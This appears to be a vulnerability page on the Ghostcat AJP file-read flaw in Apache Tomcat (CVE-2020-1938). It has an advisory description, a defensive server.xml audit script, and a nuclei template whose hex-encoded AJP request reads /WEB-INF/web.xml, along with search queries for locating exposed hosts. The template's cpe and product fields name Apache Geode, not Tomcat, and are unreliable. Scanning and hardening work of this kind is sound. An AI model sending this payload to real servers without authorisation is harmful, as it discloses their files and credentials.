Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability

Vulnerability Information

Vulnerability name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability

Vulnerability IDs:

  • CVE: CVE-2020-1938

  • CNVD: CNVD-2020-10487

Vulnerability type: File read

Severity: Critical

Description: Apache Tomcat is a widely used open-source Java Servlet container that implements the Java EE Servlet and JSP specifications and is commonly used to deploy enterprise web applications. Because of its performance and stability, Tomcat is adopted by many enterprises and developers worldwide.

The vulnerability, known as Ghostcat, concerns Tomcat's AJP (Apache JServ Protocol) connector. The AJP connector is enabled by default in Tomcat and listens on all configured IP addresses. Because Tomcat places a high level of trust in AJP connections, an attacker who can reach the AJP port can craft requests that read arbitrary files from the web application and, under certain conditions, achieve remote code execution. The root cause is Tomcat's improper handling of AJP connections: requests arriving over AJP were not sufficiently validated and restricted.

The impact is extremely severe. The vulnerability can be exploited without authentication and can lead to disclosure of sensitive information (configuration files, source code, credentials, etc.), and under specific conditions to remote code execution and full control of the affected server. Because the AJP connector is enabled by default and widely deployed, the vulnerability poses a major threat to systems running affected Tomcat versions. Users are advised to upgrade immediately to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later, or to disable unnecessary AJP connectors to mitigate the risk.
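The mitigation above (disable the AJP connector, or bind it to loopback and require a shared secret) can be checked mechanically against a Tomcat server.xml. The following Python script is an added example written for this page; it is not part of the original advisory or of the nuclei template. It parses every <Connector> element, keeps the AJP ones, and reports connectors that listen beyond loopback or accept clients without a shared secret. The attribute names it inspects (protocol, address, secret, secretRequired, requiredSecret) are Tomcat's documented AJP connector attributes; the embedded server.xml is a constructed sample that places a pre-9.0.31 default connector next to a hardened one.

```python
"""Audit a Tomcat server.xml for AJP connectors exposed to CVE-2020-1938 (Ghostcat).

Added example for this page, not code from the advisory or the nuclei template.
"""
import xml.etree.ElementTree as ET

# Addresses that keep the AJP connector reachable only from the same host.
LOOPBACK = {"127.0.0.1", "::1", "[::1]", "localhost"}
# Values (including an absent attribute) that make Tomcat bind all interfaces.
WILDCARD = {"", "0.0.0.0", "::", "[::]"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP <Connector> found in server_xml.

    Each finding is {"port": str, "issues": [str, ...]}. An empty issue list means
    the connector is bound to loopback and protected by a shared secret.
    Commented-out connectors are dropped by the XML parser, which matches the
    way Tomcat itself ignores them.
    """
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue  # HTTP/HTTPS connectors are not affected by Ghostcat
        issues = []

        address = conn.get("address", "").strip()
        if address in WILDCARD:
            issues.append("no address attribute: AJP listens on all interfaces")
        elif address not in LOOPBACK:
            issues.append(f"bound to non-loopback address {address}")

        # 'secret' (9.0.31+/8.5.51+/7.0.100+) and 'requiredSecret' (older releases)
        # both carry the shared secret an AJP client must present.
        if not (conn.get("secret") or conn.get("requiredSecret")):
            issues.append("no shared secret configured")
        if conn.get("secretRequired", "true").lower() == "false":
            issues.append('secretRequired="false" accepts unauthenticated AJP clients')

        findings.append({"port": conn.get("port", "?"), "issues": issues})
    return findings


def exposed_ajp_ports(server_xml: str) -> list:
    """Ports of AJP connectors that carry at least one issue."""
    return [f["port"] for f in audit_ajp_connectors(server_xml) if f["issues"]]


# Constructed sample: the AJP connector shipped by default before 9.0.31
# (port 8009, no address, no secret) next to a hardened connector.
SAMPLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <!-- Default connector as shipped before 9.0.31: reachable from every interface -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <!-- Hardened connector: loopback only, shared secret required (placeholder value) -->
    <Connector port="8010" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>
"""

if __name__ == "__main__":
    for finding in audit_ajp_connectors(SAMPLE_SERVER_XML):
        status = "EXPOSED" if finding["issues"] else "ok"
        print(f"AJP connector on port {finding['port']}: {status}")
        for issue in finding["issues"]:
            print(f"  - {issue}")
```

Run against a real deployment with `audit_ajp_connectors(open("/path/to/conf/server.xml").read())`. A connector reported as EXPOSED on a version before 9.0.31, 8.5.51 or 7.0.100 is the Ghostcat condition; on a patched version the same report still indicates an AJP port that should be removed, bound to loopback, or given a secret.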

Vendor: Apache

Product: Apache Tomcat

Affected versions: 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99

Search query: title="apache tomcat"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/3442666f0f77cfb9c0212eb8044484062643effd/network%2Fcves%2F2020%2FCVE-2020-1938.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2020-1938

info:
  name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability
  author: milo2012, NaN-KoreLogic
  severity: critical
  description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information, such as configuration files, source code, or credentials.
  remediation: https://access.redhat.com/solutions/4851251
  reference:
    - https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487
    - https://nvd.nist.gov/vuln/detail/CVE-2020-1938
    - https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
    - https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E
    - http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-1938
    cwe-id: CWE-269
    epss-score: 0.94469
    epss-percentile: 0.99995
    cpe: cpe:2.3:a:apache:geode:1.12.0:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: apache
    product: geode
    shodan-query:
      - title:"Apache Tomcat"
      - http.title:"apache tomcat"
    fofa-query: title="apache tomcat"
    google-query: intitle:"apache tomcat"
  tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"
    inputs:
      - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}"
        read-size: 1024
    matchers:
      - type: word
        words:
          - "See the NOTICE file distributed with"
# digest: 4a0a0047304502205ae5556991b044128ba5f41d0fdf612bc9477bc4334c3be2b8c71b519a613fd2022100e11b38470d922b9810e9bc318e4d6ebe2fa33974b298365f110a02545d7e153b:922c64590222798bb761d5b6d8e72950


Page URL: http://example.com/2025/07/06/github_2847602443/
Author: lianccc
Published: 6 July 2025
License: